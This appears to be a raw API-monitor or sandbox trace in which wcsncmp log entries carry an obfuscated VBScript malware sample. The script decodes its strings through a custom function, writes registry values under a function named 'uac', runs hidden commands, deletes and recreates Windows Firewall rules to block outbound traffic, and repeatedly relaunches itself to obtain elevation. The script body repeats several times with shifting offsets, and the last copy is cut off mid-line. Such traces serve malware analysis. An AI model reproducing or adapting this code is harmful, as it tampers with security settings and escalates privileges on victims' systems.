bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.943] wcsncmp (_String1=",2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0222.943] wcsncmp (_String1="2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37 [0222.943] wcsncmp (_String1=",Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0222.943] wcsncmp (_String1="Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf 